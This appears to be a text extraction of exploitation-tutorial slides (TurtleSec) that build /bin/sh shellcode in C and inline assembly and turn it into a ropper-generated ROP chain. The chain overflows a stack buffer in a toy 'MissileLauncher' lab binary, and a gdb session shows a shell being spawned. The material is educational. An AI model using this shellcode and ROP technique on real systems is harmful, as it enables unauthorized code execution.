  • 20. 20 TurtleSec @pati_gallardo eax Syscall number 0x06 ebx 1. argument unsigned int fd close asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 3. "xor ebx, ebxnt" // Zero out ebx - file descriptor 4. "int 0x80nt" // Invoke syscall
  • 21. 21 TurtleSec @pati_gallardo 1. 2. 3. 4. mov eax, 0x06 xor ebx, ebx xor eax, eax eax 0x00 eax 0x06 ebx 0x00 Syscall Registers eax : Syscall number ebx : unsigned int fd int 0x80 close Register State Instructions
  • 22. 22 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c open
  • 23. 23 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open - calling convention 1. const char *filename = "/dev/tty"; 2. int flag = O_RDONLY; 3. open(filename, flag);
  • 24. 24 TurtleSec @pati_gallardo esp sp stack pointer 32 16 Stack manipulation As instructions like push and pop are executed the stack pointer register (esp) is updated so it points to the "top of the stack"
  • 25. 25 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x7974742fnt" // "ytt/" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x7665642fnt" // "ved/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
  • 26. 26 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x05 xor ebx, ebx push ebx mov ebx, 0x7974742f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x7665642f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x79 y 0x74 t 0x74 t 0x2f / 0x76 v 0x65 e 0x64 d 0x2f / ecx 0x00 eax 0x00 eax 0x05 ebx 0x00000000 Stack Syscall Registers edx : umode_t mode eax : Syscall number ebx : const char *filename ecx : int flags int 0x80 ebx 0x7974742f ebx 0x7665642f ebx = esp ecx 0x00 O_RDONLY open
  • 27. 27 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c execve
  • 28. 28 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve - calling convention 1. const char *name = "/bin/sh"; 2. char *const *argv = NULL; 3. char *const *envp = NULL; 4. execve(name, argv, envp);
  • 29. 29 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x68732f2fnt" // "hs//" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x6e69622fnt" // "nib/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
  • 30. 30 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x0b xor ebx, ebx push ebx mov ebx, 0x68732f2f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x6e69622f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x68 h 0x73 s 0x2f / 0x2f / 0x6e n 0x69 i 0x62 b 0x2f / ecx 0x00 eax 0x00 eax 0x0b ebx 0x00000000 Stack Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv int 0x80 ebx 0x68732f2f ebx 0x6e69622f ebx = esp ecx 0x00 execve
  • 31. 31 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 32. 32 TurtleSec @pati_gallardo 1. int main(void) { 2. __asm__( 3. ".intel_syntax noprefixnt" 4. "xor eax, eaxnt" // Zero out 5. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 6. "xor ebx, ebxnt" // Zero out ebx - file descriptor 7. "int 0x80nt" // Invoke syscall 8. "xor eax, eaxnt" // Zero out 9. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 10. "xor ebx, ebxnt" // Zero out 11. "push ebxnt" // Push null terminator 12. "mov ebx, 0x7974742fnt" // "ytt/" 13. "push ebxnt" // Part two of the string 14. "mov ebx, 0x7665642fnt" // "ved/" 15. "push ebxnt" // Part one of the string 16. "mov ebx, espnt" // Put pointer in ebx 17. "xor ecx, ecxnt" // Zero out 18. "xor edx, edxnt" // Zero out 19. "int 0x80nt" // Invoke syscall 20. "xor eax, eaxnt" // Zero out 21. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 22. "xor ebx, ebxnt" // Zero out 23. "push ebxnt" // Push null terminator 24. "mov ebx, 0x68732f2fnt" // "hs//" 25. "push ebxnt" // Part two of the string 26. "mov ebx, 0x6e69622fnt" // "nib/" 27. "push ebxnt" // Part one of the string 28. "mov ebx, espnt" // Put pointer in ebx 29. "xor ecx, ecxnt" // Zero out 30. "xor edx, edxnt" // Zero out 31. "int 0x80nt" // Invoke syscall 32. ); 33. } execve open close shellcode_asm.c @pati_gallardo
  • 33. 33 TurtleSec @pati_gallardo $ clang -m32 -o shellcode_asm shellcode_asm.c $ ./shellcode_asm $ Test asm code for shellcode
  • 34. 34 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 36. 36 TurtleSec @pati_gallardo Foundational idea: The ret instruction transfers execution to the (return) address located on the stack
  • 37. 37 TurtleSec @pati_gallardo <addr 1> <addr 1> eax stack ptr Stack Registers RX Memory Instruction ptr <addr 1> xor eax, eax; ret; 0x00000000 <addr 2> stack ptr A ret instruction is being executed 1. ret
  • 38. 38 TurtleSec @pati_gallardo Rest of Rop Chain Return address Stack allocated buffer The Stack Buffer Overflow Gadget 1 addr Gadget 2 addr Gadget 3 addr Gadget 4 addr Gadget 5 addr Gadget 6 addr RX Memory <instructions>; ret; [0] : PADDING [1] : PADDING [2] : PADDING [3] : PADDING [4] : Gadget 1 addr [5] : Gadget 2 addr [6] : Gadget 3 addr [7] : Gadget 4 addr [8] : Gadget 5 addr [9] : Gadget 6 addr <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; Stack at time of overflow
  • 39. 39 TurtleSec @pati_gallardo Put it all into the exploit string Padding ROP Chain Gadget 1 Gadget 3 Gadget 2 Gadget 5 Gadget 4 ROP Chain
  • 40. 40 TurtleSec @pati_gallardo 1. #!/usr/bin/env python2 2. from struct import pack 3. 4. rop = '' 5. rop += 'x90'*130 # Use pattern_create/offset 6. 7. # TODO : Put in ROP chain here 8. 9. print(rop) Print ROP Chain Padding rop_chain.py @pati_gallardo Script
  • 41. 41 TurtleSec Terminal $ ropper --file target --chain execve --badbytes 00090b20 [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] filtering badbytes... 100% [LOAD] removing double gadgets... 100% [INFO] ROPchain Generator for syscall execve: [INFO] write command into data section eax 0xb ebx address to cmd ecx address to null edx address to null [INFO] Try to create chain which fills registers without delete content of previous filled registers [*] Try permuation 1 / 24 [INFO] Look for syscall gadget [INFO] syscall gadget found [INFO] generating rop chain Using ropper to find create a ROP chain
  • 42. 42 Terminal TurtleSec #!/usr/bin/env python # Generated by ropper ropchain generator # from struct import pack p = lambda x : pack('I', x) IMAGE_BASE_0 = 0x08048000 # 14e751855dc7dea49f8c9c0e10a22363f36ee225cb9bfee3b663fa039ac8a9ea rebase_0 = lambda x : p(x + IMAGE_BASE_0) rop = '' [... ROP CHAIN ...] print(rop) [INFO] rop chain generated! Using ropper to find create a ROP chain
  • 43. 43 Terminal TurtleSec rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += '//bi' rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca060) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += 'n/sh' rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca064) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000ddf4) # 0x08055df4: xor eax, eax; ret; rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca068) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret; rop += rebase_0(0x001ca060) rop += rebase_0(0x00004c88) # 0x0804cc88: pop ecx; ret; rop += rebase_0(0x001ca068) rop += rebase_0(0x000f9715) # 0x08141715: pop edx; xor eax, eax; pop edi; ret; rop += rebase_0(0x001ca068) rop += p(0xdeadbeef) rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += p(0xfffffff5) rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret; rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret; The ROP Chain 1 2 3 4 5 7 6 8 9
  • 44. 44 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3. 0x0001730c 4. 0x08055df4 5. 0x0000101e 6. 0x00004c88 7. 0x000f9715 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; ROP chain gadgets pop ebx; ret;
  • 45. 45 TurtleSec @pati_gallardo 0x000ae1aa 0x000a2c66 0x0001730c pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca060 0x000a2c66 '//bi' 0x000ae1aa eax ebx edx esi edi ebp stack ptr '//bi' stack ptr 0x001ca060 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x000ae1aa 0x000a2c66 0x0001730c
  • 46. 46 TurtleSec @pati_gallardo 0x000ae1aa 0x000a2c66 0x0001730c pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca064 0x000a2c66 'n/sh' 0x000ae1aa eax ebx edx esi edi ebp stack ptr 'n/sh' stack ptr 0x001ca064 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x000ae1aa 0x000a2c66 0x0001730c 'n/sh'
  • 47. 47 TurtleSec @pati_gallardo 0x0000ddf4 0x000a2c66 0x0001730c pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca068 0x000a2c66 0x0000ddf4 eax ebx edx esi edi ebp stack ptr 0x00000000 stack ptr 0x001ca068 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x0000ddf4 0x000a2c66 0x0001730c 'n/sh' 0x00000000
  • 48. 48 TurtleSec @pati_gallardo 0x0000101e 0x00004c88 0x000f9715 0x000ae1aa 0x000df9d3 0x000df9d3 0xfffffff5 0x000ae1aa 0xdeadbeef 0x001ca068 0x000f9715 0x001ca068 0x00004c88 0x0000101e eax ebx ecx edx edi stack ptr stack ptr stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x0000101e 0x00004c88 0x000f9715 'n/sh' pop ebx; ret; pop ecx; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; neg eax; ret; 0x001ca068 0x001ca068 0xdeadbeef stack ptr 0x000ae1aa 0xfffffff5 stack ptr 0x000df9d3 0x00000000 0x001ca060 0x0b 0x001ca060
  • 49. 49 TurtleSec @pati_gallardo 0x00113f80 0x00113f80 eax ebx ecx edx stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x00113f80 'n/sh' int 0x80; ret; 0x00000000 0x001ca068 0x001ca068 0xfffffff5 0x00000000 0x001ca060 0x0b Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv
  • 51. 51 TurtleSec @pati_gallardo 1. 0x000ae1aa 8. 0x000df9d3 9. 0x00113f80 close gadgets pop eax; ret; neg eax; ret; int 0x80; ret; 1. # 1. Zero out ebx 2. # TODO 3. 4. # 2. Put value in eax ( -0xfa = 0x06 ) 5. rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; 6. rop += p(0xfffffffa) 7. 8. # 3. Negate value in eax 9. rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret; 10. 11. # 4. Syscall 12. rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret; Missing: xor ebx, ebx; ret; Syscall Registers eax : Syscall number ebx : unsigned int fd
  • 52. 52 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3. 0x0001730c 4. 0x08055df4 5. 0x0000101e 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; int 0x80; ret; neg eax; ret; pop eax; ret; open gadgets pop ebx; ret; 1. # 11. Zero out ecx 2. # TODO 3. 4. # 12. Zero out edx 5. # TODO Missing: xor ecx, ecx; ret; Missing: xor edx, edx; ret;
  • 53. 53 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3. 0x0001730c 4. 0x08055df4 5. 0x0000101e 6. 0x00004c88 7. 0x000f9715 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; execve gadgets (from gen ROP chain) pop ebx; ret;
  • 54. 54 TurtleSec @pati_gallardo Missing 3 gadgets xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret;
  • 55. 55 Terminal TurtleSec $ ropper --file target --search "xor ebx, ebx" [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: xor ebx, ebx [INFO] File: target 0x0811e009: xor ebx, ebx; jmp edx; 0x080ee378: xor ebx, ebx; mov eax, ebx; pop ebx; pop esi; pop edi; ret; 0x0815b675: xor ebx, ebx; mov eax, ecx; int 0x80; 0x080f8a7e: xor ebx, ebx; mov eax, edx; int 0x80; 0x0816abcb: xor ebx, ebx; mov esi, 8; mov dword ptr [esp + 0xc], edx; mov eax, 0xaf; lea ecx, [ecx - 0x5c874]; call dword ptr gs:[0x10]; 0x080b4fce: xor ebx, ebx; movsx eax, al; pop ecx; push eax; push esi; call dword ptr [edx + 8]; 0x08168060: xor ebx, ebx; movzx eax, byte ptr [edi + eax - 0x20]; mov edi, dword ptr [esp + 0xc]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax; 0x081680ac: xor ebx, ebx; movzx eax, byte ptr [edx + eax - 0x20]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax; 0x0807466c: xor ebx, ebx; push eax; push edi; call dword ptr [edx + 8]; 0x080d5b4d: xor ebx, ebx; push ecx; call dword ptr [eax + 0x18]; 0x0808a868: xor ebx, ebx; push edx; push edi; call dword ptr [eax + 0x18]; 0x0804cc9a: xor ebx, ebx; ret;
  • 56. 56 TurtleSec @pati_gallardo All 3 are present in the binary xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret; 0x0804cc9a 0x0804ccad 0x0804ccc0
  • 57. 57 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 58. 58 $ hello Terminal TurtleSec $ ./rop_chain.py > rop_chain_file $ gdb -q target Reading symbols from target... (gdb) r < rop_chain_file Starting program: target < advanced_ropper_file WarGames MissileLauncher v0.1 Secret: Access granted Launching -1869574000 missiles Access denied process 3279834 is executing new program: /usr/bin/dash [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". $ Test ROP Chain